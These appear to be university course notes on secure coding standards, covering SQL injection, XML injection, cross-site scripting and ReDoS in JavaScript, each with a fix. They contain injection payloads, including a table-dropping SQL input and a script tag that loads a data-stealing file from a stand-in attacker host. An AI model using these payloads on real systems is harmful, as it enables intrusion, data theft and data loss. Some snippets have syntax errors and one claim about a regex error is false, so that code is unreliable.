50.003 - Code Standards¶

Learning Outcomes¶

By the end of this unit, you should be able to

Apply SEI CERT Java Coding Standard to improve security level of a software system

Coding Standard¶

Coding standard is a common guideline for a group of software engineers to follows so as to

have a uniform structure of most of the codes
improve readability
improve referenceability
improve maintainability
minimize exploitability

Example, we find

https://google.github.io/styleguide/
https://wiki.sei.cmu.edu/confluence/display/java/SEI+CERT+Oracle+Coding+Standard+for+Java

SEI CERT Java Coding Standard¶

Let's take SEI CERT Java Coding Standard as an example. It consists of a set of rules which are meant to provide normative requirements for code. Each rule is associated with a metrics for severity (low, medium, and high), likelihood (unlikely, probably, and likely) and remediation cost (high, medium, and low). Conformance to the rule can be determined through automated analysis (either static or dynamic), formal methods, or manual inspection techniques.

For example, we find a subset of the rules as follows,

Input valuation and data sanitization
Object-orientation (not related for now since we focus on JavaScript). But you are strongly encouraged to read up.
Locking and thread-safety (we've covered in some earlier unit in week 6.)
Visibility and atomicity (not covered in this course)

Although these coding standards are set for Java and our main language for the module is JavaScript, we will discuss those are applicable to both languages.

Input Validation and Data Sanitization¶

Many programs accept untrusted data originating from unvalidated users, network connections, and other untrusted sources and then pass the (modified or unmodified) data across a trust boundary to a different trusted domain. Such data must be sanitized.

For example, we find the following rules in this category

IDS00-J. Sanitize untrusted data passed across a trust boundary
IDS01-J. Normalize strings before validating them
IDS11-J. Eliminate non-character code points before validation

IDS00-J. Sanitize untrusted data passed across a trust boundary¶

The main idea is simple, given data provided by 3^rd party, we should perform some sanitization to ensure the data is not malicious.

SQL Injection¶

An example of such data is SQL injection.

Suppose, we have the following code

function login(db, un, pw) {
    const [rows, fieldDefs] = await db.pool.query(`
            SELECT * FROM db_user WHERE username='${un}' AND password='${pw}' 
        `);
    let found = false;
    if (rows.length > 0) {
        found = true;
    }
    return found;
}

Function login takes a database connection object con, the username un and password pw and try to search for the user record in the db_user table. Note that un and pw are input strings povided by external parties, normal users and malicious users. A malicious user might set un to "" and pw to "' OR '0'='0" the query becomes

SELECT * FROM db_user WHERE username='' AND password='' OR '0' = '0';

which always return all the records from the db_user table. As a result, the user can login without giving a user name and password.

In the worst situation, a malicious user could give the following input un = "" and pw = "'; drop table db_user; --", the query becomes

SELECT * FROM db_user WHERE username='' AND password=''; drop table db_user; --'

As a result, all the records in the db_user are deleted.

To prevent SQL injection attacks, a Prepared Statement should be used.

function login(db, un, pw) {
    const [rows, fieldDefs] = await db.pool.query(`
            SELECT * FROM db_user WHERE username= ? AND password= ? 
        `, [un, pw]);
    let found = false;
    if (rows.length > 0) {
        found = true;
    }
    return found;
}

In the updated version above, we use an overloaded query() to define a prepared statement. to manage the query. The ? placeholders allow the programmers to indicate where the untrusted input should be inserted after being sanitized. Via the prepared statement, we sanitize the untrusted input strings before inserting them into the statement.

XML Injection¶

Besides SQL injection, untrusted XML data fragment imposes threats to the system security too.

Consider the following JavaScript program

function addIPhone(qty) {
    const doc = `<item>
        <description>iPhone X</description>
        <price>999.0</price> 
        <quantity>${qty}</quantity> 
        </item>`;
    addToCart(doc);
}

when a normal user invokes the above function with qty = "1", the resulting XML document

<item>
    <description>iPhone X</description>
    <price>999.0</price>
    <quantity>1</quantity>
</item>

which captures the user's shopping item, will be process by addToCart() function.

Suppose a malicious user invokes the function with a rigged input qty = "1</quantity><price>1.0</price><quantity>1" which results in the following XML document

<item>
    <description>iPhone X</description>
    <price>999.0</price>
    <quantity>1</quantity>
    <price>1</price>
    <quantity>1</quantity>
</item>

If the addToCart() method processes the elements top-to-bottom in order, it might override the price value 999.0 by 1.

The fix to this issue is similar to the one for SQL injection. What is required is to santize the input string before embedding into the XML template which is used as a trusted data.

IDS01-J. Normalize strings before validating them¶

Cross Site Scripting¶

The third example of security loop holes caused by using untrusted data in the trusted context is Cross Site Scripting.

Consider the following app

app.use('/', (req,res) => {
    let msg = dbmodel.getOne();
    res.send(
        `<div> the message is </div> <div> ${msg} </div>`
    );
})

Suppose the message created by some normal user and recored in the database is "hello". The above route handler returns

<div> the message is </div>
<div> hello </div>

However the threat surfaces when the message retrieved from the database is "<script src='http://hacker-network.io/stealuserinfo.js' type='javascript'></script> " as the resulting html document becomes

<div> the message is </div>
<div> <script src='http://hacker-network.io/stealuserinfo.js' type='javascript'></script> </div>

when it is executed on the victim's browser, the hacker's script will be executed and extract the information from the victim's machine.

One way to address this issue is to santize the record retrieved from the database

app.use('/', (req,res) => {
    let msg = dbmodel.getOne();
    const regex = /<.*>/g;
    let html = "":
    if (msg.match(regex)) {
        html = "<div> the message contains some illegal characters </div>";
    } else {
        html = `<div> the message is </div> <div> ${msg} </div>`;
    }
    res.send(html);
})

However this might not cover all edge cases. Suppose the malicious user use the unicode representation of the < and >, namely and \uFE64 and \uFE65.

This motivates the need of normalizing the unicode representations into the ascii representation before sanization.

app.use('/', (req,res) => {
    let msg = dbmodel.getOne();
    const regex = /<.*>/g;
    let html = "":
    if (msg.normalize('NFKC').match(regex)) {
        html = "<div> the message contains some illegal characters </div>";
    } else {
        html = `<div> the message is </div> <div> ${msg} </div>`;
    }
    res.send(html);
})

Using Regex to sanitze input¶

Regular expression (Regex) is a commonly use domain specific language for string and data matching. It has a compact syntax and light-weightish implementation. Most of the languages come with libraries support of regex. For instance, in JavaScript, we use the following statement to define a regex object.

const re = /ab+c/

or

const re = new RegExp("ab+c")

Then we can run it using

console.log(abbbbc.match(re));

Here are some basic examples of constructing regex pattern.

Matching a single expression¶

const r1 = /a/;  // match one
"aaa".match(r1); // [ 'a', index: 0, input: 'aaa', groups: undefined ]

In the above code snippet, r1 is a regex that matches a character a. In the second line, we match the input string aaa with the pattern. The result contains the part that the regex matches, which is 'a', its index and the input and the groups if available. Note that it only searches for the pattern once in the input string.

Matching a single expression globally¶

If we want to apply the regex to look matches "globally" over the input, we define

const r2 = /a/g; // match everywhere
"aaa".match(r2); // [ 'a', 'a', 'a' ]

Case insensitivity¶

If we would like to ignore case sensitivity during the match, we add i to the flags field.

const r3 = /a/ig; // match everywhere case insensitively 
"aAa".match(r3); // [ 'a', 'A', 'a' ]

Anchored match¶

Sometimes we would like to regex to match with the exact starting and ending of the input.

const r4 = /^a$/; // match exact from the start to the end;
"aaa".match(r4);  // null

In the above ^ denotes the starting of the input and $ denotes the ending.

Character class match¶

If we want to match a set of alterantive characters, we use

const r5 = /[ab]/g; // match everywhere with character group, a or b 
"abb".match(r5);  // [ 'a', 'b', 'b' ]

Note that if we use a ^ in a [] it means not, e.g. /[^ab]/ means match any character except for a and b.

Kleene's star¶

Klenee's star allows us to repeat a sub-regex pattern many times. (Note this is different from the global flag g, which produces a list of matches).

const r6 = /a*/ // repetition, zero or more
"aaa".match(r6);  // [ 'aaa', index: 0, input: 'aaa', groups: undefined ]

Reference group¶

Sometimes, we would like to match and extract parts of the input. We use paranthesis to annotate the sub part that we would like to extract.

const r7 = /a(a*)/ // match and extract into groups 
"aaa".match(r7);  // [ 'aaa', 'aa', index: 0, input: 'aaa', groups: undefined ]

In the above, we match then extract the rest of a after the first a.

Note that we can add referenced kleene's star regex with a global flag. The following will produce an initialization error.

const r8 = /(a*)/g // error, won't allow

More on repetition¶

Besides kleene's star, we have the following different operators that define different constraint of repetition.

const r9 = /a+/ // repetition, one or more
const r10 = /a{2,}/ // repetition, two or more
const r11 = /a{2,3}/ // repetition, two or three
const r12 = /a{3}/ // repetition, exactly three

Pitfall of using Regex as input sanitzer¶

There many different algorithm in implementing regex matching. Unfortunately many existing libraries use a back-tracking approach when performing the regex matching. This leads to a possible security threat to the software system. e.g.

const evil = /^(a*)*h$/
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa".match(p);

The above takes a substantial amount of time to converge, because the nested kleene's star of (a*)*. The backtracking algorithm tries to back-track and searches for alternative to satisfy the match with the ending h character though there are exponentially many paths to back-track.

In general, when a nested repeatable regex accept an empty input, it is problematic, it is classified as evil regular expression.

For more details, refer to

1	`https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS`